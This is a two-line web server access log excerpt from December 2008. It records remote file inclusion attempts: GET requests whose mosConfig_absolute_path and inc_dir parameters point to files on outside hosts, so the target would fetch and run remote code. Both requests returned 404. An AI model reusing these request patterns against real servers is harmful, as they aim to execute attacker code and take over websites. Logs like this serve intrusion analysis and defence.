211.174.60.66 - - [14/Dec/2008:05:02:42 -0500] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.sos.com.br/images/img_100015.jpg???? HTTP/1.1" 404 216
64.18.142.194 - - [14/Dec/2008:05:02:49 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://uploader.ws/upload/200812/FX29ID1.txt?? HTTP/1.1" 404 243
